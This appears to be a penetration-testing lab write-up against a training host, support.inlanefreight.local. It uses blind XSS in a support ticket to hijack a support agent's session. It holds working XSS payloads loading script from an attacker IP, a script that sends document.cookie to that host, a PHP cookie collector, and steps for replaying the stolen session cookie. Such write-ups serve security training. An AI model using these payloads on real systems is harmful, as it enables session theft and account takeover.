## `support.inlanefreight.local`

- looks like `inlanefreight.local:8080` ![[images/Pasted image 20260628152057.png]]
- submit a test ticket via `/ticket.php` ![[images/Pasted image 20260630122138.png]]
- request/response in Burp ![[images/Pasted image 20260630122059.png]]
- the response says someone will review the ticket soon, so whatever we put in the ticket is going to be rendered in a support agent's browser; that is exactly the precondition for blind XSS

### Fuzzing

- directory fuzzing ![[images/Pasted image 20260630164638.png]]
- page fuzzing ![[images/Pasted image 20260630164631.png]]

### Blind XSS

- based on the message we saw above, test for blind XSS with the payload below (start a listener on port 9000 first; the path `TESTING_THIS` only serves to identify which injection point fired)

```javascript
"><script src=http://10.10.15.114:9000/TESTING_THIS></script>
```

![[images/Pasted image 20260630124030.png]]

- we got a callback to our listener ![[images/Pasted image 20260630124301.png]]

### Session hijacking

- create `script.js` and `index.php`

```javascript
// script.js: loaded in the victim's browser via the injected <script src=...>
// Redirects the victim to our collector with their cookies in the query string.
// Note: this is noisy (the victim sees the redirect) and only captures cookies
// without the HttpOnly flag, since document.cookie cannot read those.
document.location='http://10.10.15.114:8081/index.php?c='+document.cookie;
```

```php
<?php
// index.php: collector. Each cookie in ?c= (separated by ';') is decoded and
// appended to cookies.txt together with the victim's source IP.
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
```

- then host the files above with PHP's built-in server; the port has to match the one in `script.js` and in the payload (8081), and must not collide with the target's 8080

```bash
sudo php -S 0.0.0.0:8081
```

- inject the XSS into the message field

```javascript
"><script src=http://10.10.15.114:8081/script.js></script>
```

- got a hit on the PHP server ![[images/Pasted image 20260630130201.png]]
- cookie written to `cookies.txt` ![[images/Pasted image 20260630130228.png]]
- browse to `login.php` and open dev tools in Firefox
- in the Storage tab add a cookie with `session` as the name and the session string from `cookies.txt` as the value, then reload the page ![[images/Pasted image 20260630164408.png]]
- we now have access to `dashboard.php` without knowing the password ![[images/Pasted image 20260630164427.png]]